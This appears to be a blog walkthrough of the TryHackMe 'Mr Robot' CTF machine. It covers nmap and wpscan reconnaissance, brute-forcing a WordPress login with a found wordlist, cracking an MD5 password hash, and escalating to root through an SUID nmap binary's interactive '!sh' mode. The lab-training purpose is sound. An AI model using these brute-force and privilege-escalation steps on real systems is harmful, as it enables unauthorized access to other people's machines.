Go back

TryHackMe - Mr Robot CTF (Medium)

mrrobotfeatured

Table of contents

Open Table of contents

Information Gathering

Target: 10.10.46.34

nmap -sC -sV $ip -p- --open
22/tcp  open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 a8:12:06:7f:7f:b9:ef:fc:42:5a:91:ed:39:af:2f:ac (RSA)
|   256 0e:8e:1e:2c:54:0c:36:c8:48:28:1f:d9:73:54:3d:78 (ECDSA)
|_  256 1c:92:7d:ae:72:78:45:1e:ca:ba:9e:80:63:79:6e:b8 (ED25519)
80/tcp  open  http     Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
443/tcp open  ssl/http Apache httpd
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after:  2025-09-13T10:45:03
|_http-server-header: Apache
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

HTTP

Mr robot themed website with terminal style web interface.

#vhost vhost scan appears to have made the web server not worky

Navigating to a random non existant page reveals it’s wordpress site.

<script src="http://10.10.141.129/wp-content/themes/twentyfifteen/js/html5.js"></script>

We can also see it’s using the twentyfifteen theme. https://github.com/WordPress/WordPress/tree/master/wp-content/themes/twentyfifteen

Navigating to robots.txt reveals

User-agent: *
fsocity.dic
key-1-of-3.txt

We get one of the keys and a .dic file, when googling we find Disseminated intravascular coagulation. This is unlikely to be the intended path, so we can assume it’s a a user-defined dictionary file.

We can also see a wordpress login on the errant wordpress page. After running dirsearch. This is and the wordlist are the only things found of interest.

fsocity.dic is a wordlistlist containing what is and most certianly passwords and possibly also users.

Wordpress

#wp scan
**└─$ wpscan -e p --url https://10.10.141.129 --disable-tls-checks --no-banner --plugins-detection passive -t 100
[i] Updating the Database ...
[i] Update completed.

[+] URL: https://10.10.141.129/ [10.10.141.129]
[+] Started: Mon Aug 18 07:26:00 2025

Interesting Finding(s):

[+] Headers
 | Interesting Entries:
 |  - Server: Apache
 |  - X-Mod-Pagespeed: 1.9.32.3-4523
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] robots.txt found: https://10.10.141.129/robots.txt
 | Found By: Robots Txt (Aggressive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: https://10.10.141.129/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] The external WP-Cron seems to be enabled: https://10.10.141.129/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.3.1 identified (Insecure, released on 2015-09-15).
 | Found By: Emoji Settings (Passive Detection)
 |  - https://10.10.141.129/793bc52.html, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=4.3.1'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - https://10.10.141.129/793bc52.html, Match: 'WordPress 4.3.1'

[+] WordPress theme in use: twentyfifteen
 | Location: https://10.10.141.129/wp-content/themes/twentyfifteen/
 | Last Updated: 2025-04-15T00:00:00.000Z
 | Readme: https://10.10.141.129/wp-content/themes/twentyfifteen/readme.txt
 | [!] The version is out of date, the latest version is 4.0
 | Style URL: https://10.10.141.129/wp-content/themes/twentyfifteen/style.css?ver=4.3.1
 | Style Name: Twenty Fifteen
 | Style URI: https://wordpress.org/themes/twentyfifteen/
 | Description: Our 2015 default theme is clean, blog-focused, and designed for clarity. Twenty Fifteens simple, st...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In 404 Page (Passive Detection)
 |
 | Version: 1.3 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - https://10.10.141.129/wp-content/themes/twentyfifteen/style.css?ver=4.3.1, Match: 'Version: 1.3'

[+] Enumerating Most Popular Plugins (via Passive Methods)

[i] No plugins Found.

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Mon Aug 18 07:26:04 2025
[+] Requests Done: 49
[+] Cached Requests: 6
[+] Data Sent: 10.562 KB
[+] Data Received: 22.494 MB
[+] Memory used: 277.172 MB
[+] Elapsed time: 00:00:03**

twentyfifteen theme exploit research
https://wpscan.com/vulnerability/2499b30a-4bcc-462a-935e-1fe4664b95d5/
seems quite secure, only finding an xss vulnerability.

Initial Access

possible approaches

  1. Brute force the wordpress login
  2. Find a new exploit in the twentyfifteen theme

Wordpress login brute force

We need usernames so. From the website we can gather.
mrrobot
user
root

using wpscan to enumerate users is also possible
─$ wpscan --url http://10.10.141.129 --enumerate u
[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <==================================> (10 / 10) 100.00% Time: 00:00:00
not finding any however.

This does not allow access. However it shows that the wordpress responds with invalid username in the response. Allowing there users to be enumerated via brute force.

Using caido to brute force login

User enumeration

Deduplicating the fsociety.dic results in a significantly smaller file.

└─$ wc -l fsocity.dic                              
11451 fsocity.dic

Forwarding the login request to automate tab on caido. Then filtering the response for the string “Invalid username” with the custom caido language syntax (HTTPQL).

resp.raw.ncont:"Invalid username"

Results in the valid elliot username.

password enumeration

Doing the exact same thing but now with the password field and a different query string results in valid login credentials. elliot:ER28-0652

System Enumeration

On the system we can access robots home directory and find a password file. And which is an md5 hash, such that it can be cracked easily in crackstation.

cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b
crackstation > abcdefghijklmnopqrstuvwxyz

After using ssh to authenticate with the robot user and get a shell. We have a stable user.

We can not run sudo on the machine as the robot user it appears.

Linpeas finds suid on nmap

-rwsr-xr-x 1 root root 17K Jun  2 18:23 /usr/local/bin/nmap

Vulnerability Assessment

GTFO bins shows ways to exploit this for privilege escalation. The standard way is with sudo and to run it with the —interactive mode flag. It’s not possible to run sudo however simply by running this binary ./nmap, it launches in elevated privilege interactive mode.

Privilege Escalation

Now being in elevated nmap interactive mode.

nmap> !sh

Results in a root shell and concludes the box.

Share this post on:
Share this post via WhatsAppShare this post on FacebookShare this post on XShare this post via TelegramShare this post on PinterestShare this post via email
Next Post
Hack The Box - Dog (easy)